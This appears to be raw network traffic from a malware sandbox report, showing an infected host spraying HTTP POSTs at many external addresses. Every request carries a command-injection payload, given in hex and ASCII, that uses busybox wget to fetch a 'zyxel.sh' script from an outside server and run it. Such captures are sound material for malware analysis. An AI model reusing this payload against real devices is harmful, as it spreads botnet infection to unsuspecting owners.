Feb 14, 2024 09:30:58.103701115 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:00.759480953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.879329920 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:15.863050938 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:36.598567963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:17.557308912 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
913	192.168.2.15	52334	94.30.49.125	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.236699104 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:56.442583084 CET	659	IN	HTTP/1.0 404 Not Found !!! Pragma: no-cache Content-type: text/html <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html> Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
914	192.168.2.15	49624	31.16.68.45	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.256284952 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:56.551572084 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:56 GMT Server: Apache/2.4.57 (Debian) Referrer-Policy: no-referrer X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow X-XSS-Protection: 1; mode=block X-Powered-By: PHP/8.2.13 Set-Cookie: ocg4nas66t4k=031e107804889aa55840d6bdeb130047; path=/; HttpOnly; SameSite=Lax Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: oc_sessionPassphrase=rap6E1SfwEHGYoleo8m4r2BBB0U7pZsdh%2FtYET1t%2Br43THlbr90Bqr5FKORR8i%2F%2Bp9lzcXPMXzwhuIPEE41h9DJdO0UKeI98CnNTVaD1Ca7pX735f2DPIZa6aTe9Sf2A; path=/; HttpOnly; SameSite=Lax Set-Cookie: ocg4nas66t4k=031e107804889aa55840d6bdeb130047; path=/; HttpOnly; SameSite=Lax Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-bHhGdExpanNPRWFweTk3cFVtK1Y2OEwwOW1ZMUlqVjZHTGJjWTFlcGhGcz06N25wVmFobUdhd1NiazRxOUFRclFpcFBDb0E4RGJIMUlYZmlJRTJUNDhRaz0='; style-src 'self' 'unsafe-inline'; frame-src ; img-src data: blob:; font-src 'self' data:; media-src ; connect-src ; object-src 'none'; base-uri 'self'; Set-Cookie: nc_sameSiteCookielax=true; path=/; httponly;expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
915	192.168.2.15	50472	94.121.65.85	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.281953096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
916	192.168.2.15	39386	94.120.254.8	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.282104015 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
917	192.168.2.15	36442	62.29.101.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.282223940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
918	192.168.2.15	59214	94.122.74.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.282375097 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
919	192.168.2.15	34402	94.122.213.219	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.282511950 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
920	192.168.2.15	58336	62.202.159.158	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.432423115 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
921	192.168.2.15	43014	31.136.220.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.438390970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.079629898 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:58.327661037 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:01.015522003 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:06.135298014 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119232893 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:36.598474026 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:17.557364941 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
922	192.168.2.15	56192	31.136.252.174	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.458348989 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:57.079617023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:58.327678919 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:01.015505075 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:06.135315895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119199038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:36.598490953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:17.557343006 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
923	192.168.2.15	44806	31.41.163.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.517520905 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
924	192.168.2.15	60436	94.120.16.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.528074980 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
925	192.168.2.15	39626	94.123.2.173	8080

Timestamp	Bytes transferred	Direction	Data
